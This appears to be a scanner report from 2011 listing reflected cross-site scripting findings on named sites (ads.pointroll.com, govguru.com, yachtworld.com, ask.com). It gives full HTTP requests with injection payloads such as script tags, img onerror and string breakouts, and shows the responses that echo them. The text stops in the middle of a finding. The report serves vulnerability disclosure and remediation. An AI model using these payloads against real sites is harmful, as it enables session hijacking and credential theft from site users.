https://www.yachtworld.com/core/cached/includes/css/stylesheet-intl.css [11.4-Build-105&locale parameter]
https://www.yachtworld.com/core/globalnav/emailForm.jsp [refer_page parameter]
https://www.yachtworld.com/core/globalnav/emailForm.jsp [send_to parameter]
https://www.yachtworld.com/core/listing/advancedSearch.jsp [name of an arbitrarily supplied request parameter]
https://www.yachtworld.com/core/listing/cache/searchResults.jsp [N parameter]
https://www.yachtworld.com/core/listing/cache/searchResults.jsp [enid parameter]
https://www.yachtworld.com/core/listing/cache/searchResults.jsp [ftid parameter]
https://www.yachtworld.com/core/listing/cache/searchResults.jsp [hmid parameter]
https://www.yachtworld.com/core/listing/cache/searchResults.jsp [name of an arbitrarily supplied request parameter]
https://www.yachtworld.com/core/listing/cache/searchResults.jsp [sm parameter]
https://www.yachtworld.com/leaving_yw.cgi [url parameter]
https://www.yachtworld.com/leaving_yw.cgi [url parameter]
http://www.yachtworld.com/leaving_yw.cgi [Referer HTTP header]
https://www.yachtworld.com/leaving_yw.cgi [Referer HTTP header]
http://www.ask.com/ [wz_uid cookie]
http://www.ask.com/about [user cookie]
http://www.ask.com/about [wz_sid cookie]
http://www.ask.com/about [wz_uid cookie]
http://www.ask.com/about/legal/privacy [wz_sid cookie]
http://www.ask.com/about/legal/privacy [wz_uid cookie]
http://www.ask.com/about/legal/terms [wz_sid cookie]
http://www.ask.com/about/legal/terms [wz_uid cookie]
http://www.ask.com/advertise [wz_sid cookie]
http://www.ask.com/advertise [wz_uid cookie]
http://www.ask.com/ans [wz_uid cookie]
http://www.ask.com/answers [wz_sid cookie]
http://www.ask.com/answers [wz_uid cookie]
http://www.ask.com/answers/000/Notification [wz_sid cookie]
http://www.ask.com/answers/000/Notification [wz_uid cookie]
http://www.ask.com/blogsearch [wz_uid cookie]
http://www.ask.com/homepage [wz_uid cookie]
http://www.ask.com/jsignin [wz_sid cookie]
http://www.ask.com/jsignin [wz_uid cookie]
http://www.ask.com/more [wz_uid cookie]
http://www.ask.com/pictures [user cookie]
http://www.ask.com/pictures [wz_sid cookie]
http://www.ask.com/pictures [wz_sid cookie]
http://www.ask.com/pictures [wz_uid cookie]
http://www.ask.com/pictures [wz_uid cookie]
http://www.ask.com/pictureslanding [user cookie]
http://www.ask.com/pictureslanding [wz_sid cookie]
http://www.ask.com/pictureslanding [wz_uid cookie]
http://www.ask.com/questionoftheday [wz_sid cookie]
http://www.ask.com/questionoftheday [wz_uid cookie]
http://www.ask.com/settings [wz_sid cookie]
http://www.ask.com/settings [wz_uid cookie]
http://www.ask.com/video [wz_uid cookie]
http://www.ask.com/videos [wz_sid cookie]
http://www.ask.com/videos [wz_uid cookie]
http://www.ask.com/web [wz_sid cookie]
http://www.ask.com/web [wz_uid cookie]
http://www.ask.com/web [wz_uid cookie]
http://www.ask.com/web [wz_uid cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ads.pointroll.com/PortalServe/ [flash parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96119"%3balert(1)//f168ce1767a was submitted in the flash parameter. This input was echoed as 96119";alert(1)//f168ce1767a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=1096119"%3balert(1)//f168ce1767a&time=4|13:19|-6&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$&r=0.09495983109809458 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/
...[SNIP]...
ults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$&time=4|13:19|-6&r=0.09495983109809458&flash=1096119";alert(1)//f168ce1767a&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.2. http://ads.pointroll.com/PortalServe/ [r parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec695"%3balert(1)//d5deaeaae19 was submitted in the r parameter. This input was echoed as ec695";alert(1)//d5deaeaae19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=10&time=4|13:19|-6&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$&r=0.09495983109809458ec695"%3balert(1)//d5deaeaae19 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/
...[SNIP]...
searchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$&time=4|13:19|-6&r=0.09495983109809458ec695";alert(1)//d5deaeaae19&flash=10&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.3. http://ads.pointroll.com/PortalServe/ [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db52a"-alert(1)-"6c059e5e36d was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=10&time=4|13:19|-6&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$db52a"-alert(1)-"6c059e5e36d&r=0.09495983109809458 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$db52a"-alert(1)-"6c059e5e36d&time=4|13:19|-6&r=0.09495983109809458&flash=10&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.4. http://ads.pointroll.com/PortalServe/ [time parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93bab"%3balert(1)//ee44a590352 was submitted in the time parameter. This input was echoed as 93bab";alert(1)//ee44a590352 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=10&time=4|13:19|-693bab"%3balert(1)//ee44a590352&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$&r=0.09495983109809458 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/
...[SNIP]...
yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$&time=4|13:19|-693bab";alert(1)//ee44a590352&r=0.09495983109809458&flash=10&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.5. http://govguru.com/north-carolina/boat-registration [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://govguru.com
Path:	/north-carolina/boat-registration

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c938"><img%20src%3da%20onerror%3dalert(1)>d183c434106 was submitted in the REST URL parameter 1. This input was echoed as 5c938"><img src=a onerror=alert(1)>d183c434106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /north-carolina5c938"><img%20src%3da%20onerror%3dalert(1)>d183c434106/boat-registration HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:42:29 GMT
Keep-Alive: timeout=5, max=100
Expires: Fri, 28 Jan 2011 00:42:29 GMT
Connection: close
Set-Cookie: symfony=va581us05gjud7elcnd7ekr5j1; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 21666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Con
...[SNIP]...
<input class="text" type="text" name="q" value="north carolina5c938"><img src=a onerror=alert(1)>d183c434106 boat registration" />
...[SNIP]...

3.6. http://govguru.com/north-carolina/boat-registration [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://govguru.com
Path:	/north-carolina/boat-registration

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43a93"%3bcea0d4b1bdb was submitted in the REST URL parameter 1. This input was echoed as 43a93";cea0d4b1bdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /north-carolina43a93"%3bcea0d4b1bdb/boat-registration HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:42:31 GMT
Keep-Alive: timeout=5, max=97
Expires: Fri, 28 Jan 2011 00:42:31 GMT
Connection: close
Set-Cookie: symfony=94mbeh70dbhilfe1imdevta5g1; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Con
...[SNIP]...
<!--
s.pageName="All States Search north carolina43a93";cea0d4b1bdb boat registration";
s.eVar1=s.prop1="govguru.com";
s.eVar2=s.prop2="Search";
s.eVar3=s.prop3="north carolina43a93\";cea0d4b1bdb boat registration";
s.eVar4=s.prop4="All States";
s.eVar5="north carolin
...[SNIP]...

3.7. http://govguru.com/north-carolina/boat-registration [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://govguru.com
Path:	/north-carolina/boat-registration

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 671f2"%3b9efa48339dd was submitted in the REST URL parameter 2. This input was echoed as 671f2";9efa48339dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /north-carolina/boat-registration671f2"%3b9efa48339dd HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:43:15 GMT
Keep-Alive: timeout=5, max=96
Expires: Fri, 28 Jan 2011 00:43:15 GMT
Connection: close
Set-Cookie: symfony=1qd7onvan34ppanldsl4or64j4; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 20473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Con
...[SNIP]...
<!--
s.pageName="All States Search boat registration671f2";9efa48339dd";
s.eVar1=s.prop1="govguru.com";
s.eVar2=s.prop2="Search";
s.eVar3=s.prop3="boat registration671f2\";9efa48339dd";
s.eVar4=s.prop4="All States";
s.eVar5="boat registration671f2\";9efa48339dd";

s.cha
...[SNIP]...

3.8. http://govguru.com/north-carolina/boat-registration [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://govguru.com
Path:	/north-carolina/boat-registration

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d091"><img%20src%3da%20onerror%3dalert(1)>097a291560e was submitted in the REST URL parameter 2. This input was echoed as 1d091"><img src=a onerror=alert(1)>097a291560e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /north-carolina/boat-registration1d091"><img%20src%3da%20onerror%3dalert(1)>097a291560e HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:43:13 GMT
Keep-Alive: timeout=5, max=99
Expires: Fri, 28 Jan 2011 00:43:13 GMT
Connection: close
Set-Cookie: symfony=f8pnd0qn4huae44nobtshdqf45; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 20574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Con
...[SNIP]...
<input class="text" type="text" name="q" value="boat registration1d091"><img src=a onerror=alert(1)>097a291560e" />
...[SNIP]...

3.9. http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://govguru.com
Path:	/north-carolina/boat-registration

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66345'><script>alert(1)</script>658c07cccb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /north-carolina/boat-registration?66345'><script>alert(1)</script>658c07cccb0=1 HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:41:58 GMT
Keep-Alive: timeout=5, max=92
Expires: Fri, 28 Jan 2011 00:41:58 GMT
Connection: close
Set-Cookie: symfony=2p103sls2khnubnvrh7r3sm8n2; path=/
Set-Cookie: loc-1=%2Fnorth-carolina; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 93416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Con
...[SNIP]...
<option value='/boat-registration?66345'><script>alert(1)</script>658c07cccb0=1' >
...[SNIP]...

3.10. http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://govguru.com
Path:	/north-carolina/boat-registration

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d43"><script>alert(1)</script>e70e52d1510 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /north-carolina/boat-registration?89d43"><script>alert(1)</script>e70e52d1510=1 HTTP/1.1
